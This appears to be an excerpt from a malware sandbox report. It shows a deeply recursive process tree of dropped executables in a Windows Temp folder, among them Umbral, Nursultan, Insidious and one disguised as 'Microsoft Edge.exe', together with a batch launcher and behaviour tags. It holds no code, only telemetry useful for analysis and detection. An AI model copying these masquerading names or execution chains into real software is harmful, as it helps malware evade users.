C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
14⤵
- Executes dropped EXE
PID:6060

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
13⤵
- Checks computer location settings
- Executes dropped EXE
PID:5472

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
14⤵
- Checks computer location settings
- Executes dropped EXE
PID:6036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
15⤵
PID:2336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
16⤵
PID:464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
17⤵
PID:2760

C:\Windows\system32\cmd.exe
cmd
17⤵
PID:3216

C:\Windows\system32\chcp.com
chcp 65001
16⤵
PID:3984

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
16⤵
- Delays execution with timeout.exe
PID:4556

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
16⤵
PID:5240

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
15⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3988

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
15⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4664

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
15⤵
- Executes dropped EXE
PID:1472

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
14⤵
- Checks computer location settings
- Executes dropped EXE
PID:6092

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
15⤵
- Executes dropped EXE
PID:1604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
16⤵
PID:3616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
17⤵
PID:5700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
18⤵
PID:5648

C:\Windows\system32\cmd.exe
cmd
18⤵
PID:5736

C:\Windows\system32\chcp.com
chcp 65001
17⤵
PID:5820

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
17⤵
- Delays execution with timeout.exe
PID:3028

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
17⤵
PID:392

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
16⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5548

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
16⤵
- Suspicious use of AdjustPrivilegeToken
PID:3640

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
16⤵
PID:5332

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
15⤵
- Executes dropped EXE
PID:1244

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
16⤵
PID:5556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
17⤵
PID:5196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
18⤵
PID:5380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
19⤵
PID:2912

C:\Windows\system32\cmd.exe
cmd
19⤵
PID:5344

C:\Windows\system32\chcp.com
chcp 65001
18⤵
PID:4788

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
18⤵
- Delays execution with timeout.exe
PID:4304

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
18⤵
PID:5676

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
17⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4856

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
17⤵
- Suspicious use of AdjustPrivilegeToken
PID:4104

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
17⤵
PID:3748

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
16⤵
- Checks computer location settings
PID:5336

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
17⤵
- Checks computer location settings
PID:5284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
18⤵
PID:3264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
19⤵
PID:5452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
20⤵
PID:3700

C:\Windows\system32\cmd.exe
cmd
20⤵
PID:5000

C:\Windows\system32\chcp.com
chcp 65001
19⤵
PID:216

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
19⤵
- Delays execution with timeout.exe
PID:3660

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
19⤵
PID:4364

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
18⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5640

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
18⤵
- Suspicious use of AdjustPrivilegeToken
PID:5244

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
18⤵
PID:5892

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
17⤵
- Checks computer location settings
PID:5568

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
18⤵
PID:5944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
19⤵
PID:5136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
20⤵
PID:2760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
21⤵
PID:3888

C:\Windows\system32\cmd.exe
cmd
21⤵
PID:3216

C:\Windows\system32\chcp.com
chcp 65001
20⤵
PID:3984

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
20⤵
- Delays execution with timeout.exe
PID:6044

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
20⤵
PID:5756

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
19⤵
- Suspicious use of AdjustPrivilegeToken
PID:5152

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
19⤵
- Suspicious use of AdjustPrivilegeToken
PID:2236

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
19⤵
PID:6096

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
18⤵
PID:5476

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
19⤵
PID:4240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
20⤵
PID:3560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
21⤵
PID:1492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
22⤵
PID:1620

C:\Windows\system32\cmd.exe
cmd
22⤵
PID:3552

C:\Windows\system32\chcp.com
chcp 65001
21⤵
PID:4048

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
21⤵
- Delays execution with timeout.exe
PID:5532

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
21⤵
PID:4284

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
20⤵
- Suspicious use of AdjustPrivilegeToken
PID:2220

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
20⤵
- Suspicious use of AdjustPrivilegeToken
PID:5668

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
20⤵
PID:3748

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
19⤵
PID:6080

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
20⤵
PID:5220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
21⤵
PID:5580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
22⤵
PID:5816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
23⤵
PID:5992

C:\Windows\system32\cmd.exe
cmd
23⤵
PID:6012

C:\Windows\system32\chcp.com
chcp 65001
22⤵
PID:5892

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
22⤵
- Delays execution with timeout.exe
PID:4920

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
22⤵
PID:3952

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
21⤵
- Suspicious use of AdjustPrivilegeToken
PID:3028

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
21⤵
- Suspicious use of AdjustPrivilegeToken
PID:916

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
21⤵
PID:4564

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
20⤵
PID:5316

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
21⤵
PID:5560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
22⤵
PID:5780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
23⤵
PID:4756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
24⤵
PID:5168

C:\Windows\system32\cmd.exe
cmd
24⤵
PID:4620

C:\Windows\system32\chcp.com
chcp 65001
23⤵
PID:3720

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
23⤵
- Delays execution with timeout.exe
PID:1764

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
23⤵
PID:6088

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
22⤵
- Suspicious use of AdjustPrivilegeToken
PID:4396

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
22⤵
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
22⤵
PID:3520

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
21⤵
PID:5652

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
22⤵
- Checks computer location settings
PID:4072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
23⤵
PID:1436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
24⤵
PID:6132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
25⤵
PID:4968

C:\Windows\system32\cmd.exe
cmd
25⤵
PID:4376

C:\Windows\system32\chcp.com
chcp 65001
24⤵
PID:5236

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
24⤵
- Delays execution with timeout.exe
PID:2224

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
24⤵
PID:5916

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
23⤵
- Suspicious use of AdjustPrivilegeToken
PID:3516

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
23⤵
- Suspicious use of AdjustPrivilegeToken
PID:2612

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
23⤵
PID:3792

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
22⤵
PID:5852

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
23⤵
PID:2464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
24⤵
PID:6140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
25⤵
PID:2236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
26⤵
PID:6044

C:\Windows\system32\cmd.exe
cmd
26⤵
PID:5760

C:\Windows\system32\chcp.com
chcp 65001
25⤵
PID:208

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
25⤵
- Delays execution with timeout.exe
PID:5284

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
25⤵
PID:5912

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
24⤵
- Suspicious use of AdjustPrivilegeToken
PID:5420

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
24⤵
- Suspicious use of AdjustPrivilegeToken
PID:4240

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
24⤵
PID:4596

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
23⤵
PID:3380

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
24⤵
PID:4048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
25⤵
PID:5612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
26⤵
PID:5700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
27⤵
PID:5396

C:\Windows\system32\cmd.exe
cmd
27⤵
PID:2984

C:\Windows\system32\chcp.com
chcp 65001
26⤵
PID:5452

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
26⤵
- Delays execution with timeout.exe
PID:436

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
26⤵
PID:1124

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
25⤵
- Suspicious use of AdjustPrivilegeToken
PID:5940

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
25⤵
- Suspicious use of AdjustPrivilegeToken
PID:6060

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
25⤵
PID:3088

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
24⤵
PID:5748

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
25⤵
PID:5804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
26⤵
PID:5392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
27⤵
PID:6100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
28⤵
PID:2456

C:\Windows\system32\cmd.exe
cmd
28⤵
PID:6108

C:\Windows\system32\chcp.com
chcp 65001
27⤵
PID:6096

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
27⤵
- Delays execution with timeout.exe
PID:3620

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
27⤵
PID:5760

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
26⤵
- Suspicious use of AdjustPrivilegeToken
PID:1100

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
26⤵
- Suspicious use of AdjustPrivilegeToken
PID:5960

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
26⤵
PID:3720

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
25⤵
PID:5816

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
26⤵
- Checks computer location settings
PID:5132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
27⤵
PID:5204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
28⤵
PID:5556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
29⤵
PID:4940

C:\Windows\system32\cmd.exe
cmd
29⤵
PID:2220

C:\Windows\system32\chcp.com
chcp 65001
28⤵
PID:3328

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
28⤵
- Delays execution with timeout.exe
PID:5740

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
28⤵
PID:820

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
27⤵
- Suspicious use of AdjustPrivilegeToken
PID:2308

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
27⤵
- Suspicious use of AdjustPrivilegeToken
PID:5420

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
27⤵
PID:6056

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
26⤵
- Checks computer location settings
PID:6092

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
27⤵
- Checks computer location settings
PID:3396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
28⤵
PID:3028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
29⤵
PID:3088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
30⤵
PID:5916

C:\Windows\system32\cmd.exe
cmd
30⤵
PID:2316

C:\Windows\system32\chcp.com
chcp 65001
29⤵
PID:5036

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
29⤵
- Delays execution with timeout.exe
PID:4048

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
29⤵
PID:680

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
28⤵
- Suspicious use of AdjustPrivilegeToken
PID:728

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
28⤵
- Suspicious use of AdjustPrivilegeToken
PID:5500

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
28⤵
PID:3800

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
27⤵
PID:5160

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
28⤵
PID:5932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
29⤵
PID:5736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
30⤵
PID:364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
31⤵
PID:5408

C:\Windows\system32\cmd.exe
cmd
31⤵
PID:5300

C:\Windows\system32\chcp.com
chcp 65001
30⤵
PID:5492

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
30⤵
- Delays execution with timeout.exe
PID:2312

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
30⤵
PID:5632

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
29⤵
- Suspicious use of AdjustPrivilegeToken
PID:220

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
29⤵
- Suspicious use of AdjustPrivilegeToken
PID:4132

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
29⤵
PID:3656

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
28⤵
- Checks computer location settings
PID:5696

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
29⤵
PID:5348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
30⤵
PID:1640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
31⤵
PID:6076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
32⤵
PID:2084

C:\Windows\system32\cmd.exe
cmd
32⤵
PID:1408

C:\Windows\system32\chcp.com
chcp 65001
31⤵
PID:2108

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
31⤵
- Delays execution with timeout.exe
PID:5864

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
31⤵
PID:916

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
30⤵
- Suspicious use of AdjustPrivilegeToken
PID:3364

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
30⤵
- Suspicious use of AdjustPrivilegeToken
PID:5608

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
30⤵
PID:5708

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
29⤵
PID:3868

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
30⤵
PID:3792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
31⤵
PID:1548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
32⤵
PID:5756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
33⤵
PID:1200

C:\Windows\system32\cmd.exe
cmd
33⤵
PID:3896

C:\Windows\system32\chcp.com
chcp 65001
32⤵
PID:5784

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
32⤵
- Delays execution with timeout.exe
PID:5872

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
32⤵
PID:4808

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
31⤵
- Suspicious use of AdjustPrivilegeToken
PID:6012

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
31⤵
- Suspicious use of AdjustPrivilegeToken
PID:5812

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
31⤵
PID:6032

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
30⤵
PID:4968

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
31⤵
PID:3704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
32⤵
PID:5124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
33⤵
PID:620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
34⤵
PID:4396

C:\Windows\system32\cmd.exe
cmd
34⤵
PID:4048

C:\Windows\system32\chcp.com
chcp 65001
33⤵
PID:3044

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
33⤵
- Delays execution with timeout.exe
PID:4784

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
33⤵
PID:1620

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
32⤵
- Suspicious use of AdjustPrivilegeToken
PID:5472

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
32⤵
PID:1080

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
32⤵
PID:3872

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
31⤵
- Checks computer location settings
PID:896

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
32⤵
- Checks computer location settings
PID:2536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
33⤵
PID:4856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
34⤵
PID:1408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
35⤵
PID:5928

C:\Windows\system32\cmd.exe
cmd
35⤵
PID:4492

C:\Windows\system32\chcp.com
chcp 65001
34⤵
PID:3512

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
34⤵
- Delays execution with timeout.exe
PID:5632

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
34⤵
PID:3792

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
33⤵
- Checks processor information in registry
PID:4564

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
33⤵
PID:432

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
33⤵
PID:852

